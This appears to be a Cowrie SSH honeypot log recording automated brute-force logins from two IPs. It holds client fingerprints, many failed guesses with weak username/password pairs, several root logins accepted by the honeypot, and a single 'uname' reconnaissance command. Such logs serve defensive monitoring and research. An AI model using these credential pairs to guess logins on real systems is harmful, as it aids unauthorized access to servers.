{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-31T01:09:30.862192Z","src_ip":"212.227.125.160","session":"148021147160"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:32.030487Z","src_ip":"212.227.125.160","session":"148021147160"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57062,"dst_ip":"1.2.3.4","dst_port":22,"session":"56cb1d659598","protocol":"ssh","message":"New connection: 212.227.125.160:57062 (1.2.3.4:22) [session: 56cb1d659598]","sensor":"my-vps","timestamp":"2025-08-31T01:09:39.561689Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57340,"dst_ip":"1.2.3.4","dst_port":22,"session":"daa51fadd6c0","protocol":"ssh","message":"New connection: 212.227.235.229:57340 (1.2.3.4:22) [session: daa51fadd6c0]","sensor":"my-vps","timestamp":"2025-08-31T01:09:40.570201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:09:40.575221Z","src_ip":"212.227.235.229","session":"daa51fadd6c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:09:40.809801Z","src_ip":"212.227.235.229","session":"daa51fadd6c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54618,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bcdc35149ef","protocol":"ssh","message":"New connection: 212.227.125.160:54618 (1.2.3.4:22) [session: 0bcdc35149ef]","sensor":"my-vps","timestamp":"2025-08-31T01:09:40.878017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:09:40.879014Z","src_ip":"212.227.125.160","session":"0bcdc35149ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:09:40.951934Z","src_ip":"212.227.125.160","session":"0bcdc35149ef"}
{"eventid":"cowrie.login.failed","username":"oceanbase","password":"oceanbase","message":"login attempt [oceanbase/oceanbase] failed","sensor":"my-vps","timestamp":"2025-08-31T01:09:41.288188Z","src_ip":"212.227.125.160","session":"0bcdc35149ef"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:09:41.712123Z","src_ip":"212.227.125.160","session":"56cb1d659598"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:09:41.712895Z","src_ip":"212.227.125.160","session":"56cb1d659598"}
{"eventid":"cowrie.login.failed","username":"mahailong","password":"123456","message":"login attempt [mahailong/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:09:41.764796Z","src_ip":"212.227.235.229","session":"daa51fadd6c0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:42.426919Z","src_ip":"212.227.125.160","session":"0bcdc35149ef"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:43.008622Z","src_ip":"212.227.235.229","session":"daa51fadd6c0"}
{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:09:44.024713Z","src_ip":"212.227.125.160","session":"56cb1d659598"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57620,"dst_ip":"1.2.3.4","dst_port":22,"session":"79ade94111ee","protocol":"ssh","message":"New connection: 212.227.235.229:57620 (1.2.3.4:22) [session: 79ade94111ee]","sensor":"my-vps","timestamp":"2025-08-31T01:09:45.469205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:09:45.470102Z","src_ip":"212.227.235.229","session":"79ade94111ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:09:45.536090Z","src_ip":"212.227.235.229","session":"79ade94111ee"}
{"eventid":"cowrie.login.failed","username":"ansibleuser","password":"ansibleuser","message":"login attempt [ansibleuser/ansibleuser] failed","sensor":"my-vps","timestamp":"2025-08-31T01:09:45.841331Z","src_ip":"212.227.235.229","session":"79ade94111ee"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:45.852469Z","src_ip":"212.227.125.160","session":"56cb1d659598"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:46.908697Z","src_ip":"212.227.235.229","session":"79ade94111ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50748,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8ef9c54ee4e","protocol":"ssh","message":"New connection: 212.227.125.160:50748 (1.2.3.4:22) [session: f8ef9c54ee4e]","sensor":"my-vps","timestamp":"2025-08-31T01:09:51.231375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:09:51.232325Z","src_ip":"212.227.125.160","session":"f8ef9c54ee4e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:09:51.304726Z","src_ip":"212.227.125.160","session":"f8ef9c54ee4e"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-31T01:09:51.524498Z","src_ip":"212.227.125.160","session":"f8ef9c54ee4e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:09:52.721068Z","src_ip":"212.227.125.160","session":"f8ef9c54ee4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39584,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3514c7e5b24","protocol":"ssh","message":"New connection: 212.227.125.160:39584 (1.2.3.4:22) [session: e3514c7e5b24]","sensor":"my-vps","timestamp":"2025-08-31T01:10:01.681844Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:10:01.683115Z","src_ip":"212.227.125.160","session":"e3514c7e5b24"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:10:01.757964Z","src_ip":"212.227.125.160","session":"e3514c7e5b24"}
{"eventid":"cowrie.login.success","username":"root","password":"aB123456","message":"login attempt [root/aB123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:10:02.020295Z","src_ip":"212.227.125.160","session":"e3514c7e5b24"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:10:02.324128Z","src_ip":"212.227.125.160","session":"e3514c7e5b24"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:10:02.325146Z","src_ip":"212.227.125.160","session":"e3514c7e5b24"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:02.402424Z","src_ip":"212.227.125.160","session":"e3514c7e5b24"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:02.404196Z","src_ip":"212.227.125.160","session":"e3514c7e5b24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36882,"dst_ip":"1.2.3.4","dst_port":22,"session":"c63568f86ab1","protocol":"ssh","message":"New connection: 212.227.125.160:36882 (1.2.3.4:22) [session: c63568f86ab1]","sensor":"my-vps","timestamp":"2025-08-31T01:10:12.023216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:10:12.024165Z","src_ip":"212.227.125.160","session":"c63568f86ab1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:10:12.097484Z","src_ip":"212.227.125.160","session":"c63568f86ab1"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:10:12.326099Z","src_ip":"212.227.125.160","session":"c63568f86ab1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:10:13.124591Z","src_ip":"212.227.125.160","session":"c63568f86ab1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:10:13.125529Z","src_ip":"212.227.125.160","session":"c63568f86ab1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:13.229978Z","src_ip":"212.227.125.160","session":"c63568f86ab1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:13.231208Z","src_ip":"212.227.125.160","session":"c63568f86ab1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48318,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6aa6374a39a","protocol":"ssh","message":"New connection: 212.227.235.229:48318 (1.2.3.4:22) [session: d6aa6374a39a]","sensor":"my-vps","timestamp":"2025-08-31T01:10:21.466189Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46626,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cf61a7f4ddd","protocol":"ssh","message":"New connection: 212.227.125.160:46626 (1.2.3.4:22) [session: 6cf61a7f4ddd]","sensor":"my-vps","timestamp":"2025-08-31T01:10:22.424096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:10:22.425076Z","src_ip":"212.227.125.160","session":"6cf61a7f4ddd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:10:22.498415Z","src_ip":"212.227.125.160","session":"6cf61a7f4ddd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:10:22.665178Z","src_ip":"212.227.235.229","session":"d6aa6374a39a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:10:22.666814Z","src_ip":"212.227.235.229","session":"d6aa6374a39a"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@123","message":"login attempt [root/Admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:10:22.760157Z","src_ip":"212.227.125.160","session":"6cf61a7f4ddd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:10:23.057057Z","src_ip":"212.227.125.160","session":"6cf61a7f4ddd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:10:23.057863Z","src_ip":"212.227.125.160","session":"6cf61a7f4ddd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:23.136208Z","src_ip":"212.227.125.160","session":"6cf61a7f4ddd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:23.137470Z","src_ip":"212.227.125.160","session":"6cf61a7f4ddd"}
